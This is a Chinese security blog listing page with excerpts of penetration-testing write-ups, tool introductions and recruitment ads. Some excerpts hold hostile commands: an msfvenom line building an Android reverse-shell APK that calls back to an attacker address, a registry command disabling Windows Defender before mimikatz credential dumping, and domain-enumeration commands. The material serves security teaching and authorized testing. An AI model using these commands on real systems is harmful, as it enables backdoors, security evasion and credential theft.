记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

一次授权的渗透测试

前言一次正规且授权的测试,未使用任何扫描器,全程手工。这个客户呢是做的一个培训资料的商城。大概样子就是这样,其实当时拿到以后客户说不允许用任何扫描器,还有一点点懵。Thinkphp5.1.37 LTS 加 JQuery 1.7.2开始首先一个账户是必须要有的,难处在于因为验证码还在对接中,没法注册。只能要一个内置账户了。既然是thinkphp,习惯性的先试试runtime缓存目录看在不在。不存在。那么看看源代码直接访问static试试目录遍历,试了upload,js等等,也没有翻出一个有用的,那就进管理中心看看吧。首先是留言板随便提交了个图片,返回看详情。这里我开了抓包。
发布时间:2020-09-07 11:58 | 阅读:5290 | 评论:0 | 标签:渗透测试 渗透

xss平台搭建 创建项目没反映 解决办法

xss平台搭建 创建项目没反映解决办法最近有学员反映 第五章漏洞学习与挖掘18课 WEB安全第五章 漏洞学习与利用02xss利用平台搭建 提到的问题 问题原因?
发布时间:2020-09-03 00:26 | 阅读:8785 | 评论:0 | 标签:渗透测试 xss

来路不明的安装包请勿安装

前言本次渗透为靶机测试。切勿用于非法用途!攻击者:192.168.1.3 termux+metasploit受害者:192.168.1.2 Android 5.1 - Linux 3.10.72+ (aarch64)使用模块:multi/handler首先生成安卓木马msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=3800 -o s.apk将其移动到/storage/emulated/0/360目录。并使用蓝牙发送给受害者者。受害者安装即可。回到攻击者,启动msfconsole。
发布时间:2020-09-01 10:04 | 阅读:5846 | 评论:0 | 标签:渗透测试

分享10个渗透测试最佳工具的使用方法及下载链接

渗透测试的目的不仅是找到安全系统的易受攻击元素,还要检查企业中安全策略的合规性,衡量任何安全问题的意识和范围,并查看可能性在真正的外部实体网络攻击事件中,网络可能会遇到什么灾难。实质上,渗透测试允许你发现可能没有考虑过的弱点区域。渗透测试者提供了一种全新的视角,帮助企业改进系统安全和采用更主动的方法。借助专业工具,渗透测试更加有效和高效,以下介绍10种最佳工具。
发布时间:2020-09-01 10:04 | 阅读:6613 | 评论:0 | 标签:渗透测试 渗透

白帽子黑客教你:如何使用Dirbuster网站目录扫描神器?

一、背景介绍DirBuster是用来探测web服务器上的目录和隐藏文件的。因为DirBuster是采用java编写的,所以运行前要安装上java的环境。 来看一下基本的使用: ①:TargetURL下输入要探测网站的地址,需要注意的是这个地址要加上协议,看网站是http还是https。 ②:WorkMethod是选择工作方式,一个是get请求,一个是自动选择。一般选autoswitch的自动选择,它会自行判断是使用head方式或get方式。 ③:NumberofThread是选择扫描线程数,一般为30。电脑配置好的可根据情况选择。 ④:selectscanningtype是选择扫描类型。
发布时间:2020-08-30 09:33 | 阅读:8092 | 评论:0 | 标签:渗透测试 扫描 黑客 白帽

渗透测试工具库

本地工具dirmap 子目录扫描https://gitee.com/c0ny10/dirmapsubDomainBrute 子域名扫描https://gitee.com/c0ny10/subDomainsBruteCknife WebShell管理工具https://gitee.com/c0ny10/cknifeJSFinde
发布时间:2020-08-30 09:33 | 阅读:11669 | 评论:0 | 标签:渗透测试 渗透

从Fastjson绕WAF到打穿网闸

这是 酒仙桥六号部队 的第 29 篇文章。 全文共计2160个字,预计阅读时长8分钟。 前言 记述一次授权测试中对某企业进行测试。 PS:渗透过程中的任何敏感信息均已做过脱敏处理,如有雷同,纯属巧合。 外网渗透 通过资产收集,发现了一个XX平台,验证码特别难识别,就没有了爆破的念头。 抓包看发现参数的传递使用了JSON格式。 祭出一个Fastjosn检测的poc,网站把报错页面做了隐藏,只能进行盲打。 把poc地址指向dnslog,查看是否能收到请求。 网站使用了防火墙,payload被拦截,通过修改编码的方式,查看能否绕过。
发布时间:2020-08-28 10:33 | 阅读:14965 | 评论:0 | 标签:脉搏文库 DNSLog fastjson FastJson反序列化漏洞 Maven NPS POC RMi环境 vps

Web渗透测试——验证码自动识别工具

我们在网站登录界面,为了安全起见,除了填写用户名和密码之外,还会要求用户输入验证码才能进行登录,验证码的作用最主要的是验证输入方是一个在电脑前正在输入的人,而不是某些程序模拟人的登录操作,这样就能有效地避免网站被攻击者进行暴力破解,从而非法获得网站的登录权限,验证码的种类也是多种多样的,其中我们常见的验证码就是图片验证码,验证码上的内容包括数字、字母、数字字母混合、汉字、算式等,这些字符往往都不太清晰,主要是为了增加识别难度,避免被软件自动识别。
发布时间:2020-08-22 21:25 | 阅读:17024 | 评论:0 | 标签:渗透测试 渗透 自动

域内特定目标渗透

一、获取域内信息 1 、列出该域内所有机器名 (dsquery computer domainroot -limit 65535 && net group “domain computers” /domain) 2 、列出该域内所有用户名 (dsquery
发布时间:2020-08-21 11:59 | 阅读:10233 | 评论:0 | 标签:渗透测试 渗透

Windows Server 2016抓取明文密码

临时禁止Windows Defender REG ADD "HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f gpupdate /force 下载mimikatz后解压缩。 po
发布时间:2020-08-21 11:59 | 阅读:9789 | 评论:0 | 标签:渗透测试 windows

ZanTI v3.18全功能完美中文版【网络渗透】

简介这是一款安全测试工具,zANTI渗透测试,支持嗅探已连接的网络,来进行中间人攻击、端口扫描、cookie获取、路由安全、跑字典、抓包修改、远程控制、漏洞扫描、劫持等操作。该版本已汉化和免登录,需要root权限和busybox(瑞士小军刀),不可放vmos里运行哦。扫描网络功能开关最好玩的其实也是中间人,替代图片和重导向功能。假设小明正在看某二次元网站,当你使用了替代图片功能,成功劫持以后,便可换成是不是很奈斯,至于第二个功能的话emm,前提你得会建站才能恶搞,就不介绍了。
发布时间:2020-08-18 06:36 | 阅读:16734 | 评论:0 | 标签:渗透测试 渗透

铁头娃的渗透测试

这是 酒仙桥六号部队 的第 12 篇文章。 全文共计1268个字,预计阅读时长5分钟。 前言 争当好青年,疫情期间,坚决执行政府与公司的要求,无奈在家办公的我一如既往的接到了渗透测试的任务。 正篇 话不多说,开干。 01 信息搜集 老规矩,第一步先从信息搜集开始。 对目标进行子域名搜集,并没有发现子域名。 扫描网站目录文件,就一个后台登陆页面,其他什么都没有发现。 之后还进行了nmap端口扫描,也没有发现什么有价值的问题。 没办法,只能正面硬刚了。
发布时间:2020-08-17 17:05 | 阅读:13432 | 评论:0 | 标签:内网渗透 apk文件 Burp misc命令 Proxifier reGeog SQL注入 struts2 webshe

Bash远程解析命令执行漏洞

本文中使用的脚本仅限于学习交流,请勿非法使用,造成的一切后果,均由使用者承担,特此声明。最近在做护网前的内网测试准备,在测试过程中发现内网中存在大量的Bash远程解析命令执行漏洞,说实话这个漏洞有点陈旧了,但是对于渗透测试人员来说,这个漏洞是可以直接获取到目标服务的sehll,闲暇时间进行对此漏洞进行了再一次的复现,并编写了一个比较low的检测脚本和反弹shell的脚本。
发布时间:2020-08-16 19:29 | 阅读:11620 | 评论:0 | 标签:渗透测试 漏洞 远程 执行

黑客大神告诉你:Getshell总结

无论是常规渗透测试还是攻防对抗,亦或黑灰产对抗、APT攻击,getshell 是一个从内到外的里程碑成果。我们接下来总结下常见拿shell的一些思路和方法。文中可能有一些不足之处,还望大佬不吝赐教。
发布时间:2020-08-12 22:20 | 阅读:13448 | 评论:0 | 标签:渗透测试 黑客 shell

记一次渗透测试从XSS到Getshell过程(详细到无语)

0X00    前言 前段时间有幸和大佬们参加了一次一周的攻防演练,让我这个菜鸡体验到了红队的感觉。所以打算记录一下其中一个花了三天由xss存储到后台的踩坑过程,希望大佬们多带带。 0X01    钓鱼 到了攻防演练的第二天,早上有个同事和我说这边的一个目标存在存储xss,已经打回了cookie,但是对方开启了http-only无法利用,让我帮忙看看能不能进行钓鱼或者什么的。 于是我打开这个站看了一下登陆界面,把登陆界面扒了下来。
发布时间:2020-08-11 17:50 | 阅读:12073 | 评论:0 | 标签:内网渗透 csrf组合拳 Getshell top1w XSS 冰蝎 弱口令 攻防演练 渗透测试 爆破 红队 读取源码

机缘巧合之下拿下个发卡网还撸了把羊毛

0x01 事情经过 家乡群有个不是我们老家的广告狗天天发“出售微信抢红包软件”广告,发一次两次就算了,每天都发。最讨厌的是我在群里吹牛逼的时候他出来发广告?严重影响群内人员吹逼,十分可恶~,然后加了好友,居然发现这是我初中同学,在和他py一番了,他居然同意我对他的网站进行渗透测试,那就干就完事了,站长都同意授权了,开干 0x02 渗透过程 网站打开这个样子↓↓↓ 意外发现他还卖手机短信轰炸,电话轰炸的商品,必须干他啊! 随便点几个网页在参数的值后面加个'就找到个注入 SQLMap跑数据库没有发现后台管理员相关信息,陷入了沉思。
发布时间:2020-08-11 17:50 | 阅读:9753 | 评论:0 | 标签:内网渗透 PHP版 shell SQLMap跑数据库 SQL语句 宝塔 渗透测试 蚁剑连接

安全工程师-【贝壳找房】21届校招内推火热进行中

公司介绍: 贝壳找房创立于2018年初,定位于技术驱动的品质居住服务平台。贝壳找房致力于聚合和赋能全行业的优质服务者,打造开放合作的行业生态,为消费者提供包括二手房、新房、租赁和家装等全方位的居住服务。贝壳找房将继承和升级链家网在产品技术、品质控制和数据挖掘等方面的优势能力,继承和持续迭代大数据产品“楼盘字典”,研发和应用VR看房等创新技术手段,为消费者提供更好的服务体验。通过线上交易流程的可视化、线下的闭环服务和平台承诺,为消费者提供安全保障。

日常渗透测试搞站记录

DB2 数据库权限执行系统命令 记录一下拿到db2数据库权限之后,进行系统命令执行的过程,db2默认绑定的是50000端口: 1、创建一个临时的表 CREATE TABLE 数
发布时间:2020-07-24 02:11 | 阅读:15407 | 评论:0 | 标签:渗透测试 攻防演练 红蓝对抗 渗透

年度盘点 | 安全测试者偏爱的安全测试工具

1. Metasploit (免费) 2. Wifiphisher(免费) 1. John the Ripper (免费) 2. THC Hydra (免费) 3. Aircrack (免费) 1. Nmap (免费)  2. Net
发布时间:2020-07-17 20:07 | 阅读:18325 | 评论:0 | 标签:安全工具 mac os perl 工具 注入攻击 渗透测试 特别企划 端口扫描 系统安全 网络安全

MITM6:用IPv6攻陷IPv4网络的工具

WPAD利用的简短史 随着IPv6概念的提出,互联网上针对IPv6协议的使用也日渐增多,但即便如此IPv6在公司内部却并不受欢迎,很少会有公司使用IPv6。然而,大多数公司可能都忽略了一个问题,虽然IPv6可能没有被我们主动启用,但自Windows Vista以来的所有Windows版本(包括服务器版本)都默认启用了IPv6,并且优先级高于IPv4。 在本篇博文中,我将为大家介绍一种针对IPv6的攻击:即利用Windows网络中的默认IPv6配置,伪装DNS服务器来欺骗DNS reply,并将流量重定向到攻击者指定的端点。
发布时间:2020-07-17 20:07 | 阅读:11796 | 评论:0 | 标签:安全工具 ipv6协议 ipv6地址 工具 渗透测试

One-Lin3r:懒人的福音,渗透测试单行化工具

下载地址 演示视频 工具安装 工具运行截图 今天给大家介绍一款名叫One-Lin3r的渗透测试工具工具,这款工具可谓是“懒人”的福音,因为只需要输入一行命令,它就可以帮助我们完成渗透测试任务。 One-Lin3r One-Lin3r是一款简单的轻量级框架,而该工具的灵感来自于Metasploit的web-delivery模块。
发布时间:2020-07-17 20:07 | 阅读:12023 | 评论:0 | 标签:安全工具 工具 渗透测试 渗透

Joy:一款用于捕获和分析网络内部流量数据的工具

工具下载 Linux(Ubuntu) Windows macOS 今天给大家介绍的是一款名叫Joy的工具,该工具能够捕捉并分析网络流数据以及系统内部流数据,研究人员可以利用这些数据以及分析结果来进行网络研究、取证以及安全监控等活动。 工具下载 下载地址:【GitHub传送门】 工具介绍 Joy是一款基于BSD许可证协议下的软件数据包(基于libpcap),它可以从实时网络流量中提取数据或直接捕捉到数据包文件(pcap文件)。Joy使用的是一种指向数据流的模型,其工作机制跟IPFIX或Netflow有些类似,在捕捉到数据之后,Joy将以JSON格式呈现出这些数据。
发布时间:2020-07-17 20:07 | 阅读:12439 | 评论:0 | 标签:安全工具 工具 渗透测试 网络安全

北京暗泉信息&大连暗泉信息招聘

走进暗泉 大连暗泉信息技术有限公司(简称暗泉信息)位于大连地标星海湾广场,是以国内十年以上资深信息安全从业人员为核心的、在新的信息安全形势下专业从事网络信息安全技术的自主创新型企业,致力于打击网络犯罪领域的安全技术研究与产品研发及区块链安全领域。

记一次渗透测试实战

信息收集 用dirsearch扫了一波目录没有发现什么东西 直接用主站域名解析的ip访问发现主站是挂有cdn的 subDomainsBrute 扫描子域名 其中一个子域没挂CDN,由此找到网站的真实ip 得到真实ip后nmap扫描发现8099端口有个未知应用访问发现是个WEB服务,一个登陆界面 漏洞利用 趁nmap还在工作的时候,简单浏览了下网站的功能,伪静态,整个网站也没有什么动态功能 遂把目光放在了nmap扫出的8099端口的web服务 常规测试admin/admin,提示密码错误 l3yx/xxxx,账号不存在 那么可以确定的是这里的账号和密码验证是分开的,确有admin账号。
发布时间:2020-06-05 12:32 | 阅读:40595 | 评论:0 | 标签:Web安全 3389 8099端口 CDN dirsearch DNS带外 IP ipconfig Nmap Sqlse

利用SourceMap还原前端代码

0x00  写在前面     最近做渗透测试过程中,在通过HTML源代码中的js找接口的时候发现可以通过浏览器调试功能的源代码处能够直接看到前端Vue具体的代码。     然后再网上查了查,找到一个工具(restore-source-tree)可以直接通过SourceMap 将前端代码还原到本地。
发布时间:2020-05-27 18:21 | 阅读:71147 | 评论:0 | 标签:脉搏文库 JS output目录 restore-source-tree SourceMap 前端代码 映射文件 渗透测

如何养成良好的渗透测试项目管理习惯

如何管理渗透项目,如何养成一个良好的渗透记录习惯 渗透项目都不建议放云上,建议在电脑里搞个文件夹<文件夹记得使用bitlock加密>,项目分类,渗透分类,然后资产分类。 最好是一个项目开一台断网虚拟机,然后虚拟机快照,一个项目一个快照 季度-时间-具体项目名称-实施内容这样分,文件夹也行,通过文档记录也行。
发布时间:2020-05-22 14:58 | 阅读:28943 | 评论:0 | 标签:内网渗透 Burp django keepnote Leanote onenote Restore state 渗透测试

渗透测试-Getshell总结

  无论是常规渗透测试还是攻防对抗,亦或黑灰产对抗、APT攻击,getshell 是一个从内到外的里程碑成果。我们接下来总结下常见拿shell的一些思路和方法。文中可能有一些不足之处,还望大佬不吝赐教。
发布时间:2020-05-11 18:30 | 阅读:33938 | 评论:0 | 标签:内网渗透 APT攻击 Getshell getwebshell RCE getshell SSRF + RCE XXE

暗泉信息/职等你来~Base:北京/大连

走进暗泉 大连暗泉信息技术有限公司(简称暗泉信息)位于大连地标星海湾广场,是以国内十年以上资深信息安全从业人员为核心的、在新的信息安全形势下专业从事网络信息安全技术的自主创新型企业,致力于打击网络犯罪领域的安全技术研究与产品研发及区块链安全领域。在网络攻防、漏洞分析、产品研发等研究领域具备卓越的技术实力和丰富的实战经验,为国家及各省市执法机关提供高效专业的反网络犯罪情报分析服务和解决方案,为企事业单位提供专业的信息安全整体解决方案。
发布时间:2020-05-08 12:49 | 阅读:22954 | 评论:0 | 标签:安全招聘 C/C++语言 IDA OLLYDBG WEB安全 Win32汇编语言 WINDBG Windows研发工程师

安全众测的四个大坑

安全众测或者说安全众包已经不是新鲜事物,自从2013年主要的安全众测平台(例如HackerOne、Bugcrowd和Synack)推出以来,就作为一种消耗性企业安全服务存在。这些平台逐渐挑战传统的渗透测试方法,并开始蚕食其市场份额。此后7年间,涌现了更多的安全众测平台和竞争对手,争夺这一不断增长的市场。但是,众包安全真的是解决传统安全渗透测试弊病的灵丹妙药吗?是否会引发更多问题?在解答上述问题之前,让我们简单回顾一下传统渗透测试实际存在的问题。持续开发与交付:胶片相机拍不了视频传统的渗透测试服务的周期往往较长,类似汽车的年检,显然与当今的企业敏捷应用开发和网络安全威胁发展速度并不匹配。
发布时间:2020-03-27 16:04 | 阅读:38154 | 评论:0 | 标签:牛闻牛评 首页动态 安全众测 渗透测试

ADS

标签云